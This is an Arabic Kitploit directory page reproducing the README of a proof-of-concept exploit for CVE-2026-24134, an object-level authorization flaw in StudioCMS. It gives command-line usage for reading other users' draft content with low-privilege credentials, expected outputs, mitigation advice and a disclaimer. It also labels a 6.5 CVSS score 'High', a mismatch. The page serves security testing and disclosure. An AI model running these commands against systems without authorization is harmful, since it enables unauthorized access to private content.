Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24134-PoC — إثبات مفهوم لاستغلال CVE-2026-24134، وهي ثغرة في تفويض الوصول على مستوى الكائنات المكسور (BOLA) في StudioCMS، تُظهر وصولًا غير مصرح به إلى المحتوى المسود. | Kitploit
أدوات/GitHubGitHub/filipegaudard/cve-2026-24134-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار أمان APIاختبار الاختراقالتعلم والتعليم
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

إثبات مفهوم لاستغلال CVE-2026-24134، وهي ثغرة في تفويض الوصول على مستوى الكائنات المكسور (BOLA) في StudioCMS، تُظهر وصولًا غير مصرح به إلى المحتوى المسود.

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24134-PoC

نظرة عامة

يحتوي هذا المستودع على إثبات المفهوم (PoC) لثغرة CVE-2026-24134، وهي ثغرة في تفويض الوصول على مستوى الكائنات (BOLA) في StudioCMS.

المحتويات

  • cve_2026_24134_poc.py - سكربت الاستغلال بلغة بايثون

المتطلبات الأساسية

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

البدء السريع

الاستغلال اليدوي

root@kitploit:~
# الاستخدام الأساسي
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# حفظ المخرجات في ملف
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

الاختبار الآلي

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

الوسائط

إلزامية

  • -u, --url - عنوان URL الأساسي لـ StudioCMS المستهدف
  • --uuid - معرّف UUID للمحتوى المسودة المستهدف

وضع الاستغلال اليدوي

  • --username - اسم المستخدم للمصادقة
  • --password - كلمة المرور للمصادقة

وضع الاختبار الآلي

  • --auto-test - تفعيل الاختبار الآلي
  • --visitor-user - اسم مستخدم حساب الزائر
  • --visitor-pass - كلمة مرور حساب الزائر
  • --editor-user - اسم مستخدم حساب المحرر
  • --editor-pass - كلمة مرور حساب المحرر

اختيارية

  • --save - حفظ محتوى الاستجابة في ملف
  • --no-ssl-verify - تعطيل التحقق من شهادة SSL

سيناريوهات مثال

السيناريو 1: اختبار ما إذا كان النظام عرضة للثغرة

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

المخرجات المتوقعة إذا كان النظام عرضة للثغرة:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

المخرجات المتوقعة إذا كان النظام مُصَلَّحًا:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

السيناريو 2: استخراج محتوى المسودة

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

سيؤدي هذا إلى حفظ المحتوى الكامل للمسودة في draft_{uuid}.html.

فهم المخرجات

مؤشرات النجاح

  • [+] - عملية ناجحة (بالأخضر)
  • [*] - رسالة إعلامية (بالأزرق)
  • [!] - تحذير (بالأصفر)
  • [-] - خطأ (بالأحمر)

رموز حالة HTTP

  • 200 OK - عرضة للثغرة! تم الوصول إلى محتوى المسودة
  • 403 Forbidden - مُصَلَّح! يوجد تفويض وصول مناسب
  • 404 Not Found - معرّف UUID غير صالح أو تنفيذ آمن (يُرجع 404 بدلاً من كشف وجود المحتوى)
  • 401 Unauthorized - فشلت المصادقة

التخفيف

إذا كنت تشغّل إصدارًا عرضة للثغرة من StudioCMS، قم بالتحديث فورًا إلى الإصدار المُصَلَّح.

للمطورين

المشكلة الحقيقية: كانت عمليات التحقق من التفويض تتم على جانب العميل (JavaScript)، وليس على جانب الخادم.

وفقًا لفريق التطوير:

"حاليًا يتم التحقق من مستوى الرتبة لإعادة التوجيه في JavaScript على جانب العميل، وكان من المفترض استبدالها بعد ذلك بوقت قصير."

الإصلاح: نقل التفويض من جانب العميل إلى الخادم.

المبدأ الأساسي: لا تثق أبدًا في العميل. أمان جانب العميل = تحسين تجربة المستخدم. أمان جانب الخادم = حماية فعلية.

إخلاء المسؤولية القانوني

مهم: هذه الأداة مقدمة لأغراض تعليمية واختبار الأمان المصرح به فقط.

  • استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني في معظم الولايات القضائية
  • المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة
  • اتبع دائمًا ممارسات الإفصاح المسؤول

المراجع

  • CVE: CVE-2026-24134
  • CVSS: 6.5 High
  • CWE: CWE-639
  • OWASP: API1:2023 - Broken Object Level Authorization

الاتصال

للاستفسارات حول هذا الإثبات أو الثغرة:

  • المؤلف: Filipe Gaudard

الترخيص

تم إصدار هذا الإثبات لأغراض تعليمية. استخدمه بمسؤولية وأخلاقية.

تنزيل الأداة